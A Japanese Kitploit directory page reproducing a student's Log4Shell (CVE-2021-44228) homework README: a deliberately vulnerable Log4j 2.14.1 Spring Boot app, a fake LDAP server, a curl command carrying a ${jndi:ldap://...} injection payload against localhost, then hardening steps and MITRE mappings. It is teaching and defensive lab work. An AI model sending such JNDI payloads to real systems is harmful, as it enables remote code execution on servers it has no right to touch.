Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4shell-homework9 — SEAS 8405向けLog4Shell(CVE-2021-44228)エクスプロイトデモ。脆弱なSpring Bootアプリ、偽LDAPサーバー、Dockerセットアップ、MITREマッピング、インシデントレスポンス、およびフルスクリーン録画が含まれます。 | Kitploit
ツール/GitHubGitHub/serpilrivas/log4shell-homework9
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育インシデントレスポンスラボと実践
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

SEAS 8405向けLog4Shell(CVE-2021-44228)エクスプロイトデモ。脆弱なSpring Bootアプリ、偽LDAPサーバー、Dockerセットアップ、MITREマッピング、インシデントレスポンス、およびフルスクリーン録画が含まれます。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

課題9 – Log4Shellエクスプロイトに対するシステムの保護

概要

このプロジェクトは、脆弱なLog4j 2.14.1を使用するDocker化されたJava Webアプリケーションを用いて、Log4Shellの脆弱性(CVE-2021-44228)の悪用と緩和を実証します。この構成には、JNDIインジェクション攻撃経路を実証するための、模擬的な悪意のあるLDAPサーバーも含まれます。

悪用後、Log4jのアップグレード、入力検証、MITRE D3FENDおよびATT&CKの推奨事項の適用により、システムは強化されます。


フォルダ構成

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

実行方法

1. Javaアプリをビルドする(脆弱なLog4jを使用)

root@kitploit:~
docker build -t vulnerable-app .

2. Docker Composeでアプリを実行する

root@kitploit:~
docker-compose up

アプリは次の場所で実行されます:
http://localhost:8080

3. 偽のLDAPサーバーを起動する(新しいターミナルで)

root@kitploit:~
python3 ldap_server.py

4. エクスプロイトをシミュレートする

次のようなリクエストをアプリに送信します:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

LDAPサーバーがリクエストを受信します(これによりJNDIエクスプロイトがシミュレートされます)。


強化方法

攻撃を実証した後、システムは次の方法で保護されました:

  • Log4jをバージョン2.17.0にアップグレード
  • 入力検証(${jndi:...} パターンのブロック)
  • 構成でのメッセージルックアップの無効化
  • 影響範囲を制限するためのDocker分離
  • MITRE D3FENDおよびATT&CKのテクニックを適用

MITREマッピング

MITRE ATT&CK:

  • T1190: 公開アプリケーションの悪用
  • T1210: リモートサービスの悪用

MITRE D3FEND:

  • D3-IA: 入力検証
  • D3-HI: ホストベースの侵入検知
  • D3-DA: 安全でない機能の無効化

レポート

mitigation_report.pdf を参照してください:

  • 強化前後のシステムアーキテクチャ
  • Log4Shellの説明
  • 緩和戦略
  • インシデント対応計画

画面録画

動画が直接アップロードされていない場合は、レポート内のリンクから確認できます。


著者

Serpil Rivas
SEAS 8405 – サイバーセキュリティアーキテクチャ
2025年5月

ツールをダウンロード